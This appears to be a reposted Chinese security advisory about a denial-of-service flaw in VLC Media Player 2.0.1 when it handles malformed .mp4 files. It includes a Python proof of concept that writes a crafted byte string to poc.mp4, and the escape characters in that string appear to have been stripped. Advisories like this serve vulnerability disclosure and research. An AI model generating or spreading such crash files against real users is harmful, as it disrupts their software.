发布日期:2012-04-20
更新日期:2012-04-23受影响系统:
VideoLAN VLC Media Player 2.0.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53169VLC Media Player是多媒体播放器(最初命名为VideoLAN客户端)是VideoLAN计划的多媒体播放器。VLC Media Player在处理畸形.mp4文件时,在实现上存在拒绝服务漏洞,攻击者可利用此漏洞使受影响应用崩溃。<*来源:Senator http://www.linuxidc.com/Linux/2012-04/59125.htm
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Senator ()提供了如下测试方法:Data =
"x00x00x00x1Cx66x74x79x70x6Dx70x34x32x00x00x00x00x69x73x6Fx6Dx61x76x63x31x6Dx70x34x32x00x01x19x28x6Dx6Fx6Fx76x00x00x00x6Cx6Dx76x68x64x00x00x00x00xC7x21xFCx5BxC7x21xFCx5Bx00x00x02x58x00x02x22xA8x00x01x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x03x00x00x00x15x69x6Fx64x73x00x00x00x00x10x07x00x4FxFFxFFx29x15xFFx00x00xA5xE5x74x72x61x6Bx00x00x00x5Cx74x6Bx68x64x00x00x00x01xC7x21xFCx5BxC7x21xFCx5Bx00x00x00x01x00x00x00x00x00x02x22x9Cx00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x40x00x00x00xFFxFFxFFx00x00x00x00x00x00x00xA5x81x6Dx64x69x61x00x00x00x20x6Dx64x68x64x00x00x00x00xC7x21xFCx5BxC7x21xFCx5Bx00x00x00x00x00x9CxF0x00x55xC4x00x00x00x00x00x42x68x64x6Cx72x00x00x00x00x00x00x00x00x73x6Fx75x6Ex00x00x00x00x00x00x00x00x00x00x00x00x28x43x29x20x32x30x30x37x20x47x6Fx6Fx67x6Cx65x20x49x6Ex63x2Ex20x76x30x38x2Ex31x33x2Ex32x30x30x37x2Ex00x00x00xA5x17x6Dx69x6Ex66x00x00x00x10x73x6Dx68x64x00x00x00x00x00x00x00x00x00x00x00x24x64x69x6Ex66x00x00x00x1Cx64x72x65x66x00x00x00x00x00x00x00x01x00x00x00x0Cx75x72x6Cx20x00x00x00x01x00x00xA4xDBx73x74x62x6Cx00x00x00x5Bx73x74x73x64x00x00x00x00x00x00x00x01x00x00x00x4Bx6Dx70x34x61x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x02x00x10x00x00x00x00xACx44x00x00x00x00x00x27x65x73x64x73x00x00x00x00x03x19x00x00x00x04x11x40x15x00x01xE6x00x02x2Dx38x00x01xCDx28x05x02x12x10x06x01x02x00x00x00x18x73x74x74x73x00x00x00x00x00x00x00x01x00x00x27x3Cx00x00x04x00x00x00x00x28x73x74x73x63x00x00x00x00x00x00x00x02x00x00x00x01x00x00x00x16x00x00x00x01x00x00x01xC9x00x00x00x0Cx00x00x00x01x00x00x9Dx04x73x74x73x7Ax00x00x00x00x00x00x00x00x00x00x27x3Cx00x00x00x09x00x00x00x09x00x00x00x09x00x00x00x09x00x00x00x09x00x00x00x09x00x00x01x6Dx00x00x01x5Fx00x00x01x8Ex00x00x01x76x00x00x01x7Bx00x00x01x72x00x00x01x76x00x00x01x7Ex00x00x01x75x00x00x01x7Bx00x00x01x74x00x00x01x75x00x00x01x71x00x00x01x6Bx00x00x01x61x00x00x01x63x00x00x01x6Dx00x00x01x5Ex00x00x01x66x00x00x01x5Dx00x00x01x55x00x00x01x5Dx00x00x01x66x00x00x01x66x00x00x01x60x00x00x01x59x00x00x01x56x00x00x01x54x00x00x01x68x00x00x01x4Bx00x00x01x4Dx00x00x01x51x00x00x01x4Cx00x00x01x43x00x00x01x40x00x00x01x3Dx00x00x01x2Ex00x00x01x19x00x00x01x12x00x00x01x03x00x00x01x1Dx00x00x01x1Ax00x00x01x16x00x00x01x21x00x00x01x08x00x00x01x18x00x00x01x1Ax00x00x01x09x00x00x00xFFx00x00x00xFFx00x00x01x01x00x00x00xFDx00x00x00xF7x00x00x00xF5x00x00x01x15x00x00x01x1Ax00x00x01x17x00x00x01x09x00x00x01x0Dx00x00x01x11x00x00x01x0Fx00x00x01x14x00x00x01x09x00x00x01x19x00x00x01x03x00x00x01x0Ex00x00x00xF8x00x00x00xEFx00x00x01x0Ex00x00x01x10x00x00x01x12x00x00x01x0Bx00x00x01x0Dx00x00x01x0Cx00x00x01x0Cx00x00x01x11x00x00x01x07x00x00x01x0Ax00x00x01x08x00x00x01x08x00x00x01x00x00x00x01x0Dx00x00x01x09x00x00x01x01x00x00x00xFDx00x00x01x01x00x00x00xFFx00x00x01x05x00x00x01x01x00x00x01x02x00x00x01x09x00x00x00xFCx00x00x00xFEx00x00x00xFDx00x00x01x00x00x00x01x03x00x
avi
= open("poc.mp4", "wb+")
avi.write(Data)
avi.close()
print
"[-] MP4 file generated"建议:
--------------------------------------------------------------------------------
厂商补丁:VideoLAN
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.videolan.org/Hitachi JP1/IT Desktop Management - Manager多个安全漏洞极限OA办公系统存在多个跨站脚本漏洞相关资讯 拒绝服务漏洞 VLC漏洞
- VLC任意指针间接引用漏洞(CVE-2015 (08/26/2015 16:11:21)
- VLC Media Player ".wav"文件内存 (05/13/2014 15:36:41)
- Rockwell Automation FactoryTalk (04/10/2013 09:08:12)
| - VLC Media Player "src/network/ (08/18/2015 21:53:07)
- 数字签名拒绝服务漏洞(CVE-2013- (11/13/2013 12:25:03)
- Intel 82574L Gigabit Ethernet (03/01/2013 21:09:03)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|
易网时代-编程资源站